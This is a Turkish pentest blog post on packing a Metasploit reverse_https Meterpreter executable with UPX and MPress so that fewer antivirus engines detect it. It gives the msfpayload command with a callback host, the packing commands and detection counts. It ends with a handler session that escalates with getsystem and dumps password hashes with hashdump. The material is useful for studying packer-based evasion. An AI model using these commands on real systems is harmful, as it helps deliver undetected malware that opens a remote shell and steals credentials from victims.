UPX ve MPress Dosya Sıkıştırma Uygulamaları Kullanılarak Zararlı Yazılım Oluşturma

Sızma testleri sırasında antivirüslerin atlatılarak hedef sistemin ele geçirilmesi kritik bir aşamadır. Bu yazıda, Metasploit tarafından sağlanan msfpayload modülü kullanılarak hazırlanan exe uygulama dosyası UPX ve Mpress dosya sıkıştırma programları ile sıkıştırılacak, sonrasında da antivirüslere yakalanmayan zararlı uygulamalar oluşturulacaktır.

Dosya sıkıştırma uygulamaları, aslında çalıştırılabilir dosya üzerinde sıkıştırma işlemi gerçekleştirip dosyanın işlevini değiştirmeyen sadece görünümünü değiştiren yazılımlardır. Normal sıkıştırıcılardan (zip, winrar) farklı olarak dosyanın nasıl açılıp yorumlanacağı yeni oluşturulan paketlenmiş dosyanın içerisinde yer alır. Bu yüzden yeni oluşturulan dosyalara kendi başına açılabilir arşiv (self-extracting archive) denilmektedir. Dosya sıkıştırma uygulamalarının, sıkıştırma ve antivirüslerden gizlenme gibi kullanımlarının yanında diğer bir kullanım amacı da tersine mühendislik yapmayı zorlaştırarak yazılımların kaynak kodunun elde edilmesini zorlaştırmaktır.

Dosya sıkıştırma uygulamaları, analiz işini zorlaştırmak için aşağıdaki özellikleri kullanabilirler:

  • Sıkıştırma
  • Şifreleme
  • Tersine mühendislik yöntemlerini zorlaştıran metotlar

Bu yazıda dosya sıkılaştırma uygulamaları ile MsfPayload ile oluşturulan zararlı bir yazılım UPX ve Mpress adlı sıkıştırma araçlarıyla yeniden paketlenecektir.

Metasploit kullanılarak oluşturulan bir payload aşağıdaki gibi gerçekleştirilebilir:

msfpayload windows/meterpreter/reverse_https LHOST=192.168.2.48 LPORT=443 > Uygulama1.exe

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-01

Bu uygulama 36 AV tarafından tespit edilmiştir.

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-02

Kali üzerindeki UPX adlı sıkılaştırma aracı ile aynı uygulamanın sıkılaştırılmış hali oluşturulabilir:

upx -9qf -oUygulama2.exe Uygulama1.exe

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-03

Sıkıştırılmış dosyanın 37 AV tarafından tespit edilmiştir.

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-04

Mpress ile sıkıştırma işlemi aşağıdaki gibidir:

mpress.exe Uygulama1.exe

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-05

Sıkıştırılmış dosyanın 30 AV tarafından tespit edilmiştir.

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-06

Mpress gibi çok fazla yaygınlaşmamış paketleyicilerin kullanılması AV’ler tarafından tespit edilme oranını azaltacaktır.

Oluşturulan uygulamanın işlevselliğinde bir değişiklik olmamaktadır. Aşağıdaki komutlar sonrasında uygulama çalıştırılınca ters HTTPS bağlantısı kurulmaktadır.

msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set LHOST 192.168.2.48
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit -j
msf exploit(handler) > sessions -i 1
meterpreter > getsystem
meterpreter > hashdump
meterpreter > run hashdump

evading-anti-virus-detection-using-upx-and-mpress-executable-compression-tools-07

 

Kaynaklar:

http://en.wikipedia.org/wiki/Executable_compression
http://www.matcode.com/mpress.htm
https://www.bilgiguvenligi.gov.tr/zararli-yazilimlar/paketleyiciler-packers-calistirilabilir-sikistiricilar.html

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.